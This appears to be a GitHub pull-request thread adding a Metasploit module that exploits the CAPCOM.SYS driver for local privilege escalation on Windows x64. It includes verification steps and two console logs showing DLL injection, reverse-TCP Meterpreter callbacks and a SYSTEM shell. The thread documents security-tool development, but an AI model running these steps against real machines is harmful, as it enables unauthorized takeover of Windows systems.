Add LPE exploit module for the capcom driver flaw

[OJ]

This PR includes code that exploits the "feature" provided by the CAPCOM.SYS driver for Windows x64 that allows for user-land functions to be executed in the context of the kernel.

The exploit has only been tested on Windows 7, but should work on earlier versions, or any other version that doesn't have SMAP support.

Sample Run

msf exploit(capcom_sys_exec) > exploit

[*] Started reverse TCP handler on 10.1.10.40:9999 
[*] Launching notepad to host the exploit...
[+] Process 3036 launched.
[*] Reflectively injecting the exploit DLL into 3036...
[*] Injecting exploit into 3036...
[*] Exploit injected. Injecting payload into 3036...
[*] Payload injected. Executing exploit...
[*] Sending stage (1189423 bytes) to 10.1.10.52
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 13 opened (10.1.10.40:9999 -> 10.1.10.52:49189) at 2016-09-27 22:25:55 +1000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

Verification

• Create a handler that can receive an x64 Windows Meterpreter payload.
• Create matching payload.
• Create or locate a Windows x64 system that has the capcom.sys driver installed.
• Run the Meterpeter payload on that system as a low privileged user.
• Verify that the session connects.
• Run use exploit/windows/local/capcom_sys_exec
• Set the payload to any of choice.
• Set the session to that which was created on the target system.
• Run exploit
• Verify that the resulting session is running under the context of the NT AUTHORITY\SYSTEM user.

More information

This all began thanks to TheWack0lian's tweet. Go read it!

This tweet is also interesting for research purposes.

Note: The CAPCOM.SYS driver is, by default, installed in the %WINDIR%\system32 folder, so be sure to put it there yourself when testing, otherwise this module will not work (it's the only verification it does).

Note: Also, the driver itself has no version information in it, so we can't really rely on it as part of the check.

Final Note: If anyone is interested in the "process" that I followed to analyse and build this, I live-streamed the process on Twitch and stashed it on Youtube as well. It can be found here: https://www.youtube.com/watch?v=pJZjWXxUEl4&list=PLYovnhafVaw9Mg-TIuiu86Zq8lQ6MBgCr First part is the analysis and dev of exploit, second is the MSF module creation. There's quite a bit of me flapping about, but I get there in the end. Hopefully some people find it useful!

[OJ]

I plan to do more testing with this on other operating systems when I have the chance. My feeling is that Windows 8 and lower will work fine (x64 only). Higher will require some more work to bypass SMAP. Until then, this module will BSOD those operating systems that support SMAP.

[Wack0]

"Note: The CAPCOM.SYS driver is, by default, installed in the %WINDIR%\system32 folder, so be sure to put it there yourself when testing, otherwise this module will not work (it's the only verification it does)."

Are you sure? I saw no such check when reversing the driver.

(I also attempted to make a PoC, but I was doing all my testing on Windows 10, which of course has SMAP. I was unsuccessful.)

[OJ]

Yes I'm sure. Validated by someone who has the application installed.

[justinsteven]

@Wack0 It's the module that does the verification of "is Capcom.sys in system32?" before firing the exploit, not Capcom.sys itself.

[OJ]

Thanks for clarifying @justinsteven. I failed to make that connection there.

[OJ]

I'll add some documentation shortly.

[OJ]

@Wack0 have made sure I've given you credit where possible, by the way.

[pbarry-r7]

Neat addition, I'll verify and land. Thanks, @OJ!!

[pbarry-r7]

Verified. I was able to escalate the privilege of my standard, non-admin Windows user:

$ ./msfconsole


     .~+P``````-o+:.                                      -o+:.
.+oooyysyyssyyssyddh++os-`````                        ```````````````          `
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.`                 .-.-...-////+++++++++++++++////////~~//////++++++++++++///
                                `...............`              `...-/////...`


                                  .::::::::::-.                     .::::::-
                                .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
                                 :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
                                 .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
                                  -Nd`  :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
                                   -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
    `oo/``-hd:  ``                 .sNd  :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
      .yNmMMh//+syysso-``````       -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
    .shMMMMN//dmNMMMMMMMMMMMMs`     `:```-o++++oooo+:/ooooo+:+o+++oooo++/
    `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
          /MMMMMMMMMMMMMMMMMMd.     `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
          -hMMmssddd+:dMMmNMMh.     `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
          .sMMmo.    -dMd--:mN/`           ||--X--||          ||--X--||
........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================

                     Press ENTER to size up the situation

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                        Press SPACE BAR to continue



       =[ metasploit v4.12.29-dev-76b3c37                 ]
+ -- --=[ 1586 exploits - 903 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler
msf exploit(handler) > setg lhost 10.0.2.4
lhost => 10.0.2.4
msf exploit(handler) > setg payload windows/x64/meterpreter/reverse_tcp
run
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to 10.0.2.29
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.29:49167) at 2016-09-28 10:54:49 -0500

meterpreter > getuid
Server username: my-win764\standardbob
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/capcom_sys_exec
msf exploit(capcom_sys_exec) > set session 1
session => 1
msf exploit(capcom_sys_exec) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Launching notepad to host the exploit...
[+] Process 1832 launched.
[*] Reflectively injecting the exploit DLL into 1832...
[*] Injecting exploit into 1832...
[*] Exploit injected. Injecting payload into 1832...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (1189423 bytes) to 10.0.2.29
[*] Meterpreter session 2 opened (10.0.2.4:4444 -> 10.0.2.29:49168) at 2016-09-28 10:55:41 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

[pbarry-r7]

Release Notes

This module achieves local privilege escalation on a Windows target by exploiting a "feature" provided by the CAPCOM.SYS driver for Windows x64. The "feature" is the driver allows for user-land functions to be executed in the context of the kernel. Currently this module has only been tested with Windows 7, but should work on earlier Windows versions or any other version that doesn't have SMAP support.

[OJ]

Thank you!